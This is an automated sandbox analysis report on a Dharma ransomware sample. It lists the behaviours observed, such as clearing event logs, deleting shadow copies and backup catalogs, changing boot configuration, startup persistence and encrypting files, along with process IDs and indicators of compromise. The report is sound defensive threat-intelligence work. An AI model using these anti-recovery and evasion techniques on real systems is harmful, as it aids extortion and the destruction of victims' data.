dharma | 5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8

Resubmissions

12-05-2023 13:34

230512-qvjbpadc48 10

08-05-2023 17:48

230508-wdvw2sdf6v 10

Analysis

max time kernel
133s
max time network
34s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
08-05-2023 17:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

VirusShare_5c36e305d926e55ef98d392176890cd2.exe
Size

1.0MB
MD5

5c36e305d926e55ef98d392176890cd2
SHA1

64a15cdf89b6c8b85cba355b6944074614d810fd
SHA256

5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8
SHA512

082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b
SSDEEP

24576:EoZZV7Uqi5inyhZQDkUzVDZJ2vH53GaJR38:HOqigyDQDZVq52wM

Score

10^/10

dharma discovery evasion ransomware

Malware Config

Signatures

Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
ransomware dharma

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
1792	wevtutil.exe
1032	wevtutil.exe
1012	wevtutil.exe
1492	wevtutil.exe
1092	wevtutil.exe
304	wevtutil.exe
220	wevtutil.exe
1864	wevtutil.exe
2024	wevtutil.exe
956	wevtutil.exe
1716	wevtutil.exe
1596	wevtutil.exe
1012	wevtutil.exe
216	wevtutil.exe
1440	wevtutil.exe
1616	wevtutil.exe
908	wevtutil.exe
1888	wevtutil.exe
676	wevtutil.exe
864	wevtutil.exe
1620	wevtutil.exe
1140	wevtutil.exe
804	wevtutil.exe
1512	wevtutil.exe
204	wevtutil.exe
1652	wevtutil.exe
1256	wevtutil.exe
1652	wevtutil.exe
676	wevtutil.exe
1596	wevtutil.exe
220	wevtutil.exe
1808	wevtutil.exe
280	wevtutil.exe
1508	wevtutil.exe
1924	wevtutil.exe
1040	wevtutil.exe
1760	wevtutil.exe
1452	wevtutil.exe
1808	wevtutil.exe
436	wevtutil.exe
1596	wevtutil.exe
1168	wevtutil.exe
916	wevtutil.exe
1992	wevtutil.exe
1508	wevtutil.exe
1096	wevtutil.exe
280	wevtutil.exe
1760	wevtutil.exe
1804	wevtutil.exe
204	wevtutil.exe
1156	wevtutil.exe
772	wevtutil.exe
572	wevtutil.exe
208	wevtutil.exe
1940	wevtutil.exe
1000	wevtutil.exe
932	wevtutil.exe
1136	wevtutil.exe
864	wevtutil.exe
1160	wevtutil.exe
1736	wevtutil.exe
1780	wevtutil.exe
1048	wevtutil.exe
1088	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

864 bcdedit.exe
1912 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

1096 wbadmin.exe
Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

pid	process
864	bcdedit.exe
1912	bcdedit.exe

pid	process
1096	wbadmin.exe

Drops startup file 3 IoCs

Processes:

cmd.exeattrib.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe	attrib.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

1124 icacls.exe

pid	process
1124	icacls.exe

Enumerates connected drives 3 TTPs 42 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

VirusShare_5c36e305d926e55ef98d392176890cd2.exewevtutil.exevssadmin.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	ioc	process
File opened (read-only)	\??\S:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\e:	wevtutil.exe
File opened (read-only)	\??\E:	wevtutil.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\f:	wevtutil.exe
File opened (read-only)	\??\G:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\B:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\U:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\Y:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\Z:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\F:	wevtutil.exe
File opened (read-only)	\??\g:	wevtutil.exe
File opened (read-only)	\??\H:	wevtutil.exe
File opened (read-only)	\??\E:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\A:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\g:	wevtutil.exe
File opened (read-only)	\??\G:	wevtutil.exe
File opened (read-only)	\??\P:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\Q:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\h:	wevtutil.exe
File opened (read-only)	\??\h:	wevtutil.exe
File opened (read-only)	\??\f:	wevtutil.exe
File opened (read-only)	\??\F:	wevtutil.exe
File opened (read-only)	\??\I:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\L:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\M:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\N:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\O:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\V:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\D:	wevtutil.exe
File opened (read-only)	\??\F:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\K:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\H:	wevtutil.exe
File opened (read-only)	\??\R:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\T:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\W:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\X:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\D:	wevtutil.exe
File opened (read-only)	\??\G:	wevtutil.exe
File opened (read-only)	\??\H:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\J:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe

Drops file in Program Files directory 64 IoCs

Processes:

VirusShare_5c36e305d926e55ef98d392176890cd2.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01182_.WMF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182946.WMF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\CAGCAT10.MMW.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\London.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00397_.WMF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Hardcover.eftx.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\RSPMECH.POC.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PICCAP98.POC.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\README-JDK.html.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Publisher.en-us\SETUP.XML.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\PipelineSegments.store.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00527_.WMF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\SketchPadTestSchema.xml.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\XLICONS.EXE.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR47B.GIF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.lnk.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\weblink.api.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageSmall.jpg.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_LightSpirit.gif.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\IETAG.DLL.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR44F.GIF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Phoenix.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0217262.WMF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS.DEV_COL.HXT.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0233512.WMF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.lnk.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00135_.WMF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0232795.WMF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02756U.BMP.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Americana.css.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSGR3FR.LEX.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Samarkand.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Adobe.css.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\VOLTAGE.WAV.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Martinique.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0293236.WMF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\BUTTON.GIF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apothecary.xml.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\form_edit.js.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-loaders.xml.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00274_.WMF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187837.WMF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jre7\lib\ext\zipfs.jar.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Zaporozhye.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\USP10.DLL.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00636_.WMF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107182.WMF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196060.WMF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Saipan.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02161_.WMF.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Off.jpg.id-4C63E006.[[email protected]].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe

Drops file in Windows directory 4 IoCs

Processes:

wevtutil.exeVirusShare_5c36e305d926e55ef98d392176890cd2.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wevtutil.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wevtutil.exe
File created	C:\Windows\HRMPRIV	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wevtutil.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

1760 sc.exe
1580 sc.exe
1796 sc.exe
2020 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

904 schtasks.exe
332 schtasks.exe
868 schtasks.exe
1084 schtasks.exe

pid	process
1760	sc.exe
1580	sc.exe
1796	sc.exe
2020	sc.exe

pid	process
904	schtasks.exe
332	schtasks.exe
868	schtasks.exe
1084	schtasks.exe

Interacts with shadow copies 2 TTPs 15 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
1668	vssadmin.exe
1472	vssadmin.exe
1512	vssadmin.exe
1004	vssadmin.exe
1604	vssadmin.exe
1588	vssadmin.exe
1500	vssadmin.exe
1096	vssadmin.exe
1140	vssadmin.exe
1412	vssadmin.exe
1768	vssadmin.exe
844	vssadmin.exe
1492	vssadmin.exe
804	vssadmin.exe
1936	vssadmin.exe

Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1784 taskkill.exe
2028 taskkill.exe
812 taskkill.exe
1724 taskkill.exe
2004 taskkill.exe
Runs net.exe

pid	process
1784	taskkill.exe
2028	taskkill.exe
812	taskkill.exe
1724	taskkill.exe
2004	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

VirusShare_5c36e305d926e55ef98d392176890cd2.exe

pid	process
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

Processes:

taskkill.exetaskkill.exewevtutil.exevssvc.exewevtutil.execmd.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	1784	taskkill.exe
Token: SeDebugPrivilege	2028	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1804	wevtutil.exe
Token: SeSecurityPrivilege	1804	wevtutil.exe
Token: SeTakeOwnershipPrivilege	1804	wevtutil.exe
Token: SeLoadDriverPrivilege	1804	wevtutil.exe
Token: SeSystemProfilePrivilege	1804	wevtutil.exe
Token: SeSystemtimePrivilege	1804	wevtutil.exe
Token: SeProfSingleProcessPrivilege	1804	wevtutil.exe
Token: SeIncBasePriorityPrivilege	1804	wevtutil.exe
Token: SeCreatePagefilePrivilege	1804	wevtutil.exe
Token: SeBackupPrivilege	1804	wevtutil.exe
Token: SeRestorePrivilege	1804	wevtutil.exe
Token: SeShutdownPrivilege	1804	wevtutil.exe
Token: SeDebugPrivilege	1804	wevtutil.exe
Token: SeSystemEnvironmentPrivilege	1804	wevtutil.exe
Token: SeRemoteShutdownPrivilege	1804	wevtutil.exe
Token: SeUndockPrivilege	1804	wevtutil.exe
Token: SeManageVolumePrivilege	1804	wevtutil.exe
Token: 33	1804	wevtutil.exe
Token: 34	1804	wevtutil.exe
Token: 35	1804	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	1804	wevtutil.exe
Token: SeSecurityPrivilege	1804	wevtutil.exe
